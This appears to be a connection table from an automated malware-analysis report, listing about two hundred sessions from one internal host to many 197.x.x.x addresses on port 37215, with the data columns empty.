                                                                            13934192.168.2.1555664197.156.219.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13935192.168.2.1544692197.145.21.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13936192.168.2.1541388197.217.23.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13937192.168.2.1560778197.108.26.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13938192.168.2.1538108197.157.191.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13939192.168.2.1536618197.61.170.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13940192.168.2.1544722197.66.50.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13941192.168.2.1549956197.214.148.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13942192.168.2.1555880197.232.10.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13943192.168.2.1559894197.230.193.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13944192.168.2.1560678197.108.163.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13945192.168.2.1544302197.89.18.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13946192.168.2.1555840197.241.95.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13947192.168.2.1545534197.212.7.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13948192.168.2.1539194197.48.10.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13949192.168.2.1547864197.51.158.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13950192.168.2.1542706197.5.215.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13951192.168.2.1537168197.106.196.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13952192.168.2.1537960197.100.109.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13953192.168.2.1538874197.56.243.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13954192.168.2.1534368197.61.162.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13955192.168.2.1556930197.29.239.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13956192.168.2.1555772197.100.215.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13957192.168.2.1532784197.183.124.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13958192.168.2.1559124197.168.68.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13959192.168.2.1548614197.93.86.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13960192.168.2.1541086197.64.96.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13961192.168.2.1556608197.151.113.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13962192.168.2.1534746197.207.191.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13963192.168.2.1542794197.189.243.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13964192.168.2.1545486197.237.26.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13965192.168.2.1553694197.241.239.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13966192.168.2.1539580197.30.38.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13967192.168.2.1555978197.56.35.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13968192.168.2.1548212197.56.196.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13969192.168.2.1538174197.100.39.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13970192.168.2.1535216197.122.151.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13971192.168.2.1553688197.65.39.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13972192.168.2.1556572197.22.3.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13973192.168.2.1541640197.140.97.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13974192.168.2.1552778197.188.248.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13975192.168.2.1535690197.49.249.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13976192.168.2.1541978197.161.70.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13977192.168.2.1545132197.96.171.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13978192.168.2.1542872197.33.216.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13979192.168.2.1549038197.112.42.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13980192.168.2.1537834197.244.127.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13981192.168.2.1558266197.77.57.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13982192.168.2.1557242197.192.131.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13983192.168.2.1545140197.221.170.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13984192.168.2.1542290197.24.60.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13985192.168.2.1534812197.224.85.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13986192.168.2.1540694197.208.152.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13987192.168.2.1551438197.236.135.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13988192.168.2.1542948197.137.96.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13989192.168.2.1535838197.175.40.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13990192.168.2.1539686197.106.9.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13991192.168.2.1544772197.251.119.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13992192.168.2.1554992197.58.36.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13993192.168.2.1555838197.105.109.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13994192.168.2.1550434197.215.146.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13995192.168.2.1558382197.167.205.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13996192.168.2.1553024197.152.42.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13997192.168.2.1541352197.82.23.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13998192.168.2.1541818197.104.140.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13999192.168.2.1536758197.91.220.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14000192.168.2.1542652197.38.192.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14001192.168.2.1549556197.235.31.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14002192.168.2.1556382197.235.205.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14003192.168.2.1541854197.71.176.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14004192.168.2.1556316197.88.228.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14005192.168.2.1544416197.185.31.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14006192.168.2.1536532197.138.110.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14007192.168.2.1533002197.125.111.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14008192.168.2.1540296197.247.242.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14009192.168.2.1538200197.157.233.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14010192.168.2.1555270197.123.39.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14011192.168.2.1550088197.187.107.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14012192.168.2.1547898197.121.27.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14013192.168.2.1548916197.222.2.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14014192.168.2.1543632197.145.120.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14015192.168.2.1559434197.27.70.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14016192.168.2.1546992197.254.170.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14017192.168.2.1550738197.149.72.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14018192.168.2.1547340197.30.137.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14019192.168.2.1537170197.174.94.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14020192.168.2.1533772197.87.140.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14021192.168.2.1557380197.143.102.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14022192.168.2.1552220197.164.245.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14023192.168.2.1557024197.160.43.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14024192.168.2.1546076197.133.162.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14025192.168.2.1537502197.41.198.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14026192.168.2.1533190197.245.86.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14027192.168.2.1547168197.249.186.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14028192.168.2.1550172197.141.147.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14029192.168.2.1541870197.148.19.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14030192.168.2.1548086197.253.63.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14031192.168.2.1533702197.197.27.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14032192.168.2.1560670197.167.239.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14033192.168.2.1556830197.57.152.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14034192.168.2.1536340197.26.118.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14035192.168.2.1560296197.174.141.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14036192.168.2.1548958197.108.114.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14037192.168.2.1537826197.73.52.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14038192.168.2.1547970197.184.219.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14039192.168.2.1550846197.71.50.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14040192.168.2.1549230197.146.245.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14041192.168.2.1550932197.92.177.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14042192.168.2.1555254197.248.64.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14043192.168.2.1533098197.83.1.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14044192.168.2.1544496197.247.236.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14045192.168.2.1540464197.212.7.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14046192.168.2.1551662197.135.176.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14047192.168.2.1533904197.40.85.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14048192.168.2.1537066197.68.66.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14049192.168.2.1542230197.37.133.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14050192.168.2.1558608197.234.195.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14051192.168.2.1537414197.120.230.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14052192.168.2.1547686197.190.105.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14053192.168.2.1541170197.53.230.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14054192.168.2.1538062197.102.103.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14055192.168.2.1546340197.3.40.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14056192.168.2.1550240197.209.213.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14057192.168.2.1556902197.219.75.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14058192.168.2.1539266197.199.67.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14059192.168.2.1541584197.176.55.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14060192.168.2.1546910197.65.48.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14061192.168.2.1538642197.56.47.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14062192.168.2.1537686197.156.56.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14063192.168.2.1546552197.114.88.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14064192.168.2.1558324197.26.238.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14065192.168.2.1550706197.142.121.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14066192.168.2.1541874197.185.10.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14067192.168.2.1536130197.6.68.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14068192.168.2.1537968197.25.73.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14069192.168.2.1550544197.171.77.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14070192.168.2.1536030197.167.151.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14071192.168.2.1548636197.122.188.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14072192.168.2.1555906197.135.243.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14073192.168.2.1543256197.233.168.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14074192.168.2.1539718197.80.247.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14075192.168.2.1538910197.226.70.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14076192.168.2.1551382197.147.97.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14077192.168.2.1559346197.103.107.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14078192.168.2.1541602197.98.122.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14079192.168.2.1536736197.189.247.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14080192.168.2.1543226197.90.180.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14081192.168.2.1537020197.77.131.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14082192.168.2.1539110197.195.129.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14083192.168.2.1555274197.192.185.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14084192.168.2.1555460197.186.95.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14085192.168.2.1536368197.184.47.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14086192.168.2.1550192197.234.13.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14087192.168.2.1543384197.101.77.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14088192.168.2.1541298197.52.106.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14089192.168.2.1545952197.142.159.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14090192.168.2.1557062197.63.69.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14091192.168.2.1536248197.210.192.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14092192.168.2.1542218197.163.104.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14093192.168.2.1534584197.5.26.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14094192.168.2.1556580197.219.108.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14095192.168.2.1556428197.165.97.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14096192.168.2.1550168197.65.174.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14097192.168.2.1555866197.66.242.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14098192.168.2.1542970197.247.110.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14099192.168.2.1558218197.211.203.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14100192.168.2.1540642197.198.94.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14101192.168.2.1551872197.126.237.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14102192.168.2.1545136197.204.154.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14103192.168.2.1560534197.71.64.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14104192.168.2.1536564197.77.102.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14105192.168.2.1546064197.226.170.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14106192.168.2.1534422197.128.163.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14107192.168.2.1558622197.102.242.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14108192.168.2.1556148197.245.227.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14109192.168.2.1555226197.129.194.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14110192.168.2.1543918197.224.44.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14111192.168.2.1536166197.226.187.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14112192.168.2.1552518197.221.75.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14113192.168.2.1545364197.197.85.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14114192.168.2.1533302197.187.102.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14115192.168.2.1553346197.188.238.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14116192.168.2.1553186197.159.152.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14117192.168.2.1554312197.11.109.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14118192.168.2.1555972197.50.37.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14119192.168.2.1553016197.22.155.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14120192.168.2.1533594197.228.225.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14121192.168.2.1538056197.95.216.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14122192.168.2.1553068197.30.41.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14123192.168.2.1558224197.128.55.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14124192.168.2.1546904197.13.131.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14125192.168.2.1539778197.169.123.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14126192.168.2.1534000197.119.169.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14127192.168.2.1540358197.190.140.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14128192.168.2.1552084197.23.80.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14129192.168.2.1555970197.73.100.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14130192.168.2.1539976197.37.148.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14131192.168.2.1546162197.128.44.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14132192.168.2.1549542197.239.6.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14133192.168.2.1547080197.12.114.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
